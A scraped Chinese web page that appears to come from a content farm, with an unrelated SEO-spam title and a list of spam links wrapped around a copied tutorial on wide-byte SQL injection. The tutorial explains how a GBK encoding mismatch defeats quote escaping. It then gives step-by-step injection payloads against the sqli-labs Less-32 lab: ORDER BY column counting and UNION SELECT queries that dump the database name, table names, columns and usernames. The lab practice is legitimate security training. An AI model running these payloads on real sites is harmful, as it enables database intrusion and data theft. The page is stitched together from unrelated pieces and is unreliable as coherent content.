当前位置: 首页 > news >正文

企业网站托管排版设计制作h5网页是什么意思

企业网站托管排版设计制作,h5网页是什么意思,广告联盟排行榜,网络广告营销案例1.1 宽字节注入原理 宽字节注入#xff0c;在 SQL 进行防注入的时候#xff0c;一般会开启 gpc#xff0c;过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入#xff0c;但是如果数据库编码不 对#xff0c;也可以导致 SQL 防注入绕过#xff0c;达到注入…1.1 宽字节注入原理 宽字节注入在 SQL 进行防注入的时候一般会开启 gpc过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入但是如果数据库编码不 对也可以导致 SQL 防注入绕过达到注入的目的。如果数据库设置宽字节字 符集 gbk 会导致宽字节注入从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解要有宽字节注入漏洞首先要满足数据库后端使用双/多字节解析 SQL 语句其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符初步的测试结果 Big5 和 GBK 字符集都是有的 UTF-8 和 GB2312 没 有这种字符也就不存在宽字节注入。 gpc 绕过过程。 gpc 绕过过程 %df%27(addslashes)%df%5c%27(数据库 GBK)運 1.2 宽字节注入靶场 http://192.168.1.24/sqli-labs/Less-32 1.3 判断注入点 ?id1%df and 11-- ?id1%df and 12-- 通过页面的回显发现确实存在宽字节注入以及单引号注入点 1.4 使用order by字段数 ?id1%df and 11 order by 4-- ?id1%df and 11 order by 3-- 字段数为3 1.6 找回显以及爆数据库名 找回显信息收集 ?id1%df and 12 union select 1,database(),3-- 1.7 爆数据库表名 爆破数据库表 ?id1%df and 12 union select 1,2,group_concat(table_name)from information_schema.tables where table_schemadatabase()-- 1.8 爆破字段 爆破字段内容因为users中单引号会被转义因此采取十六进制代替users ?id-1%df union select 1,2, group_concat(column_name) from information_schema.columns WHERE table_name0x7573657273-- 1.9爆破字段内容 ?id-1%df union select 1,2, group_concat(username) from users--
http://www.pierceye.com/news/236319/

相关文章:

  • 网站建设 客户定位支付网站建设费会计分录
  • 深圳网站设计工作室广告公司名字 三个字
  • 长沙门户网站广告网站设计公司
  • 余姚网站建设的公司wordpress 开发文档
  • 怎么建设一个微信网站莱芜金点子最新招工信息
  • 石家庄网站排名优化wordpress修改布局
  • 景安服务器管理助手如何备份网站国外做图标网站
  • 网站轮播怎么做石家庄网站建设规划
  • 免费软件网站下载深圳网站开发哪个公司好
  • 建设项目验收网站公示内网门户网站建设方案
  • 滨海做网站哪家最好宝安附近做网站公司
  • 详情页的五大模块东莞网站优化科技有限公司
  • 南阳建设网站哪家好昆明网站服务
  • 大潮建设集团有限公司 网站网站改版策划方案
  • 网站开发心路历程烟台网站建设薇企汇互联见效付款
  • 企业网站的制作周期wordpress添加数据库表
  • 广告推广营销网站网站买空间的价格
  • 转转假网站怎么做linux建设视频网站
  • 伍佰亿搜索引擎网站系统wordpress 增加备案
  • 韩国做游戏的电影 迅雷下载网站有哪些网络营销方式文献
  • 大学生兼职网站的融资方案龙华网站建设设计制作公司
  • 青之峰网站建设哪家好用什么l软件做网站了
  • 免费建站资源怎么编写app软件
  • 机关网站建设建议云南响应式网站建设
  • 对网站开发语言的统计杭州网站设计公司有哪些
  • 不会代码 怎么做网站兴义网络推广
  • 综合电子商务型企业网站怎么做网站的网盘
  • ucenter使用自己做的网站房地产新闻时事热点
  • 企业网站备案 过户电商运营视频教程
  • 做网站运营这工作怎么样北京网站优化价格